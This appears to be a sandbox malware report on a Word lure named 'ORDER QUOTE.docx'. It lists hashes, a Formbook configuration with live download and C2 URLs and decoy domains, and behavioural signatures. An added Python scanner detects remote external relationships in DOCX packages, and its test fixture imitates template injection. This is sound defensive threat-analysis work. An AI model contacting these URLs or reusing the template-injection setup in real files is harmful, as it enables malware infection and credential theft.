General

Target: ORDER QUOTE.docx
Size: 10KB
Sample: 210922-y5s8msgdem
MD5: eee70c12ab889fd6173de81fbc9a6817
SHA1: 673a841da220e5ba72e5f30d1d566569595ed352
SHA256: 7c41d53d6dd4f2979bfcdea462feef025b2f31cf55644f927ece5f4699a1b7a9
SHA512: 7647f0d5adcd468a6cbae4900ecb2887de0a0f89ba25893379f905f04b7b9ee0fa89af755c8cb1db8e4d613f11a8f9f80334de3e784677d1fac1ad51cc9db8d7
Static task: static1

Behavioral task: behavioral1
Sample: ORDER QUOTE.docx
Resource: win7v20210408

Behavioral task: behavioral2
Sample: ORDER QUOTE.docx
Resource: win10-en-20210920
Malware Config

Extracted URL: http://cml.lol/olxqqy
Extracted URL: http://198.46.199.161/joo/vbc.exe

Extracted family: formbook
Version: 4.1
Campaign: m8g0
C2: http://www.psicologarenatacruz.com/m8g0/
Decoy domains:
trypapaya.pro
instructorcornernet.com
techadvisorsfl.com
raunnan.com
filestune.com
learnitanywhereskills.com
beaullife.com
getcovidwear.com
tkrbeautyinstitut.com
lisaphamkhai.com
iconicdds.com
ksoopawlas.com
testosteron.store
jctaketwo.com
awexz.online
onlinening.com
steelwerkschicago.com
lukakordic.com
expertsofcoaching.com
dashcca.com
xn--demiatdirecto-1ib.com
yuhongicm.com
portlandsiege.com
academysta.com
blackwiremedia.com
kent-ro-service.com
awmarkets.com
speleatherware.com
rehabcenters.space
jioscircle.com
sinijitu.com
analyticsyoda.com
shlqjt.com
bikramyogamarietta.com
crowncasino9.com
smokin-balls.com
shirasu-clinic.com
856379912.xyz
ckatesting.club
dideqsa.com
goodreporters.com
bromosyon.com
ilkonceyayincilik.com
domennyarendi32.net
thegrowthinn.com
qsgasia.com
venolbolivia.com
myhalloweengift.com
deeparchivesport.com
stiltedstories.com
btcdonation.info
little-darling.com
maximumpotentialfitness.net
iading.com
datingwithgusto.com
abncustompainting.com
cropadvisorjobs.com
nanoring.info
best-practice-gastro.com
sellitech.net
mixonsolutions.com
throughthelineagency.com
gtat.pro
relicstudios.net
Targets

Target: ORDER QUOTE.docx (10KB; MD5, SHA1, SHA256 and SHA512 as listed under General)
- suricata: ET MALWARE FormBook CnC Checkin (GET)
- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- Formbook Payload
- Blocklisted process makes network request
- Downloads MZ/PE file
- Executes dropped EXE
- Abuses OpenXML format to download file from external location
- Loads dropped DLL
- Uses the VBS compiler for execution
- Drops file in System32 directory
- Suspicious use of SetThreadContext
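The "Abuses OpenXML format to download file from external location" signature above corresponds to a relationship inside the document package whose TargetMode is External and whose Target is a remote URL; Word fetches that URL when it resolves the relationship (an attached template is the usual vehicle). The report does not say which relationship type this sample used, so the check below flags any external relationship with a remote scheme in any .rels part of the package. This is an added example and not the sandbox's own detection logic; the fixture it scans is a constructed minimal DOCX with a placeholder target (http://example.invalid/template.dotm), not the real sample, and the package contains only the parts the scanner needs rather than everything Word requires.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Schemes that make Word reach outside the package when the relationship is resolved
REMOTE_SCHEMES = {"http", "https", "ftp", "file"}


def find_external_relationships(docx_bytes):
    """Scan every .rels part in an OOXML package and return a list of
    (rels_part, short_relationship_type, target) for each relationship that is
    marked TargetMode="External" and whose target uses a remote scheme."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # malformed relationship part: Word would reject it anyway
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                target = rel.get("Target", "")
                if urlsplit(target).scheme.lower() in REMOTE_SCHEMES:
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rel_type, target))
    return hits


# --- constructed fixture (not the real sample) ---------------------------------
ROOT_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{RELS_NS}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
    "</Relationships>"
)

# settings.xml.rels pointing at a remote attached template (placeholder URL, an assumption)
MALICIOUS_SETTINGS_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{RELS_NS}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://example.invalid/template.dotm" TargetMode="External"/>'
    "</Relationships>"
)

# The same part with only an internal relationship, as a benign document would carry
BENIGN_SETTINGS_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{RELS_NS}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    "</Relationships>"
)


def build_docx(settings_rels_xml):
    """Build an in-memory package with just enough parts for the scanner to walk.
    It is a constructed fixture, not a document Word would necessarily open."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("_rels/.rels", ROOT_RELS)
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/settings.xml", "<w:settings/>")
        zf.writestr("word/_rels/settings.xml.rels", settings_rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_SETTINGS_RELS), ("benign", BENIGN_SETTINGS_RELS)):
        for part, rel_type, target in find_external_relationships(build_docx(rels)) or [("-", "-", "none")]:
            print(f"{label}: {part} {rel_type} -> {target}")
```

On a real sample, read the file bytes from disk and pass them to find_external_relationships; a hit on an attachedTemplate, oleObject, hyperlink-free frame or similar relationship with an http target is what this signature is reporting, and the target URL is the first stage of the download chain shown under Malware Config.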